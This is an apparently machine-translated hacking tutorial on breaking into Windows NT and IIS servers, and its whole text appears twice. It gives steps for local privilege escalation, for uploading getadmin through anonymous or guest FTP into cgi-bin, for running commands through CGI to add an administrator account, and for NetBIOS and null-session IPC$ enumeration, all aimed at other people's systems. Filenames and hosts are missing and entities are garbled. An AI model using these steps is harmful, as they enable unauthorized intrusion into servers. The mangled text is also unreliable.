If you have an ordinary user account, there is a very simple way to get the NT Administrator account:
First change the name under c:\winnt\system32 to backup
Then change the name to
Then restart
It is a program loaded at startup. After restarting, the previous login password input interface will not appear, but the user manager
At this time, he has the authority to add himself to the Administrator group.
Don't forget to change the file name back!
Two:
The following technology is suitable for websites that do not value NT network security,
Some http technologies can also be used for reference by more advanced personnel.
You can take the following steps to enter the NT network:
Because NT's IIS server's ftp generally allows anonymous accounts to enter, some anonymous accounts have upload permissions, so we have to attack such sites. Because if anonymous accounts are not allowed, the clear text password may be transmitted online. These passwords can be intercepted using the tcpspy tool. Now I won’t talk about these more advanced technologies.
It is precisely because of the setting that allows anonymous account ftp login, which also gives us the opportunity to break through NT server. We use ftp to log in to an NT server, for example: (example name):
ftp
Connected to
ntsvr2 exposes its NETbios name. In the context of IIS, there must be an IUSER_ntsvr2 user account, which belongs to the Domain user group. This account we will use in the future to obtain the permissions of Administrator.
User ()):anonymous
Password: Enter guest@ or guest
For administrators who lack network security knowledge, many people do not ban guest accounts or set passwords. Then the guest account is a correct user account available, although it only belongs to the Domain guest group
In this case, we can enter NT server's ftp.
After entering, check the directory list and try key directories such as cd/c or wwwroot. If you are lucky and change the directory successfully, you will be 80% sure.
Now, start looking for the cgi-bin directory (or scripts directory), after entering,
Put the winnt to cgi-bin, getadmin and upload to cgi-bin
Then enter:/cgi-bin/?IUSR_SATURN
The screen will be displayed in about ten seconds:
CGI Error
At this time, there is a 90% chance that you have upgraded IUSER_ntsvr2 to Administrator, that is, anyone who visits the web site is an administrator.
You can add user:
/cgi-bin/?/c c:\winnt\system32\ user china news /add
This creates a user called china, with the password being news, and then:
/cgi-bin/?china
or
/scripts/tools/?china
You can log in with your china account and you can have the maximum permissions. You can also use the above method to modify it directly. If there is no, you can also upload it to the scripts/tools or cgi-bin directory by yourself.
Third:
Scan using NT's Netbios technology
nbtstat -a /
or
nbtstat -A /
This way you can get the shared resource name of its domain.
net view file:///
You can get the name of the shared resource of its machine, if there is a C drive
net use f: file:///c
You can use f: to map its c disk
net use $">\\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;
Chapter 4: Tools ported under Unix:
Windows95"amp;98 users can use this tcp/ip tool to capture packages in the tcp/ip connection:
You must also download this library before use.
Windows NT user version
First change the name under c:\winnt\system32 to backup
Then change the name to
Then restart
It is a program loaded at startup. After restarting, the previous login password input interface will not appear, but the user manager
At this time, he has the authority to add himself to the Administrator group.
Don't forget to change the file name back!
Two:
The following technology is suitable for websites that do not value NT network security,
Some http technologies can also be used for reference by more advanced personnel.
You can take the following steps to enter the NT network:
Because NT's IIS server's ftp generally allows anonymous accounts to enter, some anonymous accounts have upload permissions, so we have to attack such sites. Because if anonymous accounts are not allowed, the clear text password may be transmitted online. These passwords can be intercepted using the tcpspy tool. Now I won’t talk about these more advanced technologies.
It is precisely because of the setting that allows anonymous account ftp login, which also gives us the opportunity to break through NT server. We use ftp to log in to an NT server, for example: (example name):
ftp
Connected to
ntsvr2 exposes its NETbios name. In the context of IIS, there must be an IUSER_ntsvr2 user account, which belongs to the Domain user group. This account we will use in the future to obtain the permissions of Administrator.
User ()):anonymous
Password: Enter guest@ or guest
For administrators who lack network security knowledge, many people do not ban guest accounts or set passwords. Then the guest account is a correct user account available, although it only belongs to the Domain guest group
In this case, we can enter NT server's ftp.
After entering, check the directory list and try key directories such as cd/c or wwwroot. If you are lucky and change the directory successfully, you will be 80% sure.
Now, start looking for the cgi-bin directory (or scripts directory), after entering,
Put the winnt to cgi-bin, getadmin and upload to cgi-bin
Then enter:/cgi-bin/?IUSR_SATURN
The screen will be displayed in about ten seconds:
CGI Error
At this time, there is a 90% chance that you have upgraded IUSER_ntsvr2 to Administrator, that is, anyone who visits the web site is an administrator.
You can add user:
/cgi-bin/?/c c:\winnt\system32\ user china news /add
This creates a user called china, with the password being news, and then:
/cgi-bin/?china
or
/scripts/tools/?china
You can log in with your china account and you can have the maximum permissions. You can also use the above method to modify it directly. If there is no, you can also upload it to the scripts/tools or cgi-bin directory by yourself.
Third:
Scan using NT's Netbios technology
nbtstat -a /
or
nbtstat -A /
This way you can get the shared resource name of its domain.
net view file:///
You can get the name of the shared resource of its machine, if there is a C drive
net use f: file:///c
You can use f: to map its c disk
net use $">\\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;
Chapter 4: Tools ported under Unix:
Windows95"amp;98 users can use this tcp/ip tool to capture packages in the tcp/ip connection:
You must also download this library before use.
Windows NT user version